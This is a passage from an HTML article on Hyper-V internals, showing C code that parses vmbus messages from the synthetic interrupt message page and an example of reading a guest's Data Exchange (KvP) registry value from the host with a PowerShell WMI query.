<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the message type is not HvMessageTypeNone the Payload contains the vmbus message</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (phvMessage4->Header.MessageType != HvMessageTypeNone){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvmbMessage = (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVMBUS_MESSAGE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)phvMessage4->Payload;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">analyze the message and perform the vmbus type parsing</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">structure the vmbus of messages are described in LIS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">switch</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvmbMessage->vmbHeader.msgtype)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CHANNELMSG_GPADL_HEADER:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ParseGpadlHeaderMessage(pvmbMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">case</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> CHANNELMSG_OPENCHANNEL:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ParseOpenChannelMessage(pvmbMessage);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">default</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Unhandled vmbus message"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, pvmbMessage->vmbHeader.msgtype);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">else</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Error.pvSIMP is NULL"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function gets the number of active logical processor, addresses of the SIM and get value of SIM4. For example, disassembled for the type of message and CHANNELMSG_OPENCHANNEL and CHANNELMSG_GPADL_HEADER, but in LIS you can see the format of all types of messages. Messages for vmbus usually generated when turn on/turn off the virtual machine, or one of the components of Integration Services. For example, when you enable the Data Exchange feature, in the debugger you will see the following message:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="64" src="https://lh4.googleusercontent.com/RMIDm9k5tcqBHHbCDszEDm_bJghJRE1TtcuiKk0q3n8QiBEb21evYFCykAdamjqIhSNC3yKGJREW8Wv3GsNY13pbkrG4M3ytOdVhzP27Nd5HEO7DlNFNROFTkx_xPTJHp0lFs-zna9QI1e8U" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="278" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Integration Services - Data Exchange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, consider what image data is exchanged between the guest OS and his parents by the example of one of the Integration Services components - Data Exchange. This component allows the root OS to read data from a particular registry keys in the guest OS. (For information about the technology KvP again can be found in the msdn blog: http://goo.gl/R0U52l, </span><a href="http://goo.gl/8rVeNA" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://goo.gl/8rVeNA</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To verify this in the guest OS we will create the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Virtual Machine\Guest key with a value of "KvPDataValue".</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="30" src="https://lh6.googleusercontent.com/m86FpljZJ2XDmbTEO7X3aR11bDectwh3yBb0x1xcVgjMi9pRRSgfsMAjBrigERavAvjFpJCxaMfz0HfZRfViNQklZb46PB2iuP7dKbCko9OIIWubwaR3kFuTlCxJk3HWVQkFRzmf4dROduah" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="226" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To get the value of the key in the root OS the following PowerShell script has been used:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: orangered; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">$vm</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkgrey; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Get-WmiObject</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Namespace</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">root\virtualization\v2</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Class</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Msvm_ComputerSystem</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-Filter</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {</span><span style="background-color: transparent; color: blue; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ElementName</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: blueviolet; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">=</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: darkred; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">'Windows Server 2012 R2 Gen1'</span><span style="background-color: transparent; color: black; font-family: "Times New Roman"; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
